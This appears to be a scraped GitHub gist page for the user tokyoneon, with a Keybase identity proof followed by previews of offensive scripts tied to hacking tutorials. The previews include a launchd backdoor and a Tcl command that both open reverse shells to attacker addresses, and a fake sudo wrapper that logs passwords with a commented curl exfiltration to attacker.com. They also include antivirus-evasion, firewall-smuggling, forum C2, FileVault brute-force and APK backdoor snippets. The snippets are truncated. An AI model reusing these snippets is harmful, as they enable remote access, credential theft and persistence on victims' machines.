I hereby claim:
- I am tokyoneon on github.
- I am tokyoneon (https://keybase.io/tokyoneon) on keybase.
- I have a public key whose fingerprint is 94BF C36E A65D 8973 30D6 6199 C432 53B8 CE95 B841
To claim this, I am signing this object:
# write-up: https://www.varonis.com/blog/author/tokyoneon/ | |
# an if statement to prevent the attack from executing without administrator privileges | |
if (whoami /groups | findstr /i "S-1-16-12288") | |
{ | |
# start the attack as a background processs to prevent the PS terminal from stalling when opened | |
Start-Job { | |
# where to write data during the attack? | |
$temp = "$env:TEMP" |
# write-up: https://null-byte.com/powershell-evasion-0329395/ | |
# create the profile.ps1 directory if it doesn't exist | |
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden" | |
# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1 | |
$excludeFiles = "payload|evil|tokyoneon" | |
# listening ports and PIDs to exclude | |
$excludePorts = "4444|1337|31337|55555" |
# writeup: https://null-byte.com/backdoor-0325535/ | |
# create bash script executable | |
echo -e '#!/bin/bash\nexport PS1="backdoor> "\nbash -i >& /dev/tcp/ATTACKER-IP-ADDRESS/2222 0>&1' >/Library/Caches/persistence | |
# elevate file permissions | |
chmod +x /Library/Caches/persistence | |
# create launchd service | |
printf '<?xml version="1.0" encoding="UTF-8"?> |
#!/bin/bash | |
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/ | |
while true; do | |
forumUser="tokyoneon"; | |
username="tokyoneon@email.com"; | |
password="treHGFd76547^%$"; | |
cookies='/tmp/forum_cookies'; | |
function urlencode () |
#!/bin/bash | |
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/ | |
# `if` statement to detemine if the message is a 'response' one | |
# This is the command being executed and embedded in the photo. | |
# Single-quotes are used here to help with escaping special | |
# characters within the desired command(s). | |
exfilData='ls -lah "/Users/$USER/"' | |
# Where the attackers PHP server is located. This needs to be |
# https://null-byte.wonderhowto.com/how-to/hacking-macos-use-one-tclsh-command-bypass-antivirus-protections-0186330/ | |
set s [socket 1.2.3.4 9999];while 42 { puts -nonewline $s "hacker> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s; |
#!/bin/bash | |
# https://null-byte.wonderhowto.com/how-to/hacking-macos-break-into-macbook-encrypted-with-filevault-0185177/ | |
# checks to ensure all 3 args are present | |
if [[ ! $3 ]]; then | |
echo -e "\nusage: $ ./script.sh /dev/sdaX passwords.list -killswitch\n" | |
exit 0 | |
fi |
function sudo () | |
{ | |
# https://null-byte.com/privesc-0194190/ | |
realsudo="$(which sudo)"; | |
read -s -p "[sudo] password for $USER: " inputPasswd; | |
printf "\n"; | |
printf '%s\n' "$USER : $inputPasswd" > /tmp/hackedPasswd.txt; | |
# encoded=$(printf '%s' "$inputPasswd" | base64) > /dev/null 2>&1; | |
# curl -s "http://attacker.com/$USER:$encoded" > /dev/null 2>&1; | |
$realsudo -S -u root bash -c "exit" <<< "$inputPasswd" > /dev/null 2>&1; |
`/ tokyoneon ~/backdoor-apk/backdoor-apk | |
> ./backdoor-apk.sh 4.apk | |
________ | |
/ ______ \ | |
|| _ _ || | |
||| || ||| AAAAAA PPPPPPP KKK KKK | |
|||_||_||| AAA AAA PPP PPP KKK KKK | |
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK | |
||| || ||| AAAAAAAA PPPPPPPP KKK KKK | |
|||_||_||| AAA AAA PPP KKK KKK |
I hereby claim:
To claim this, I am signing this object: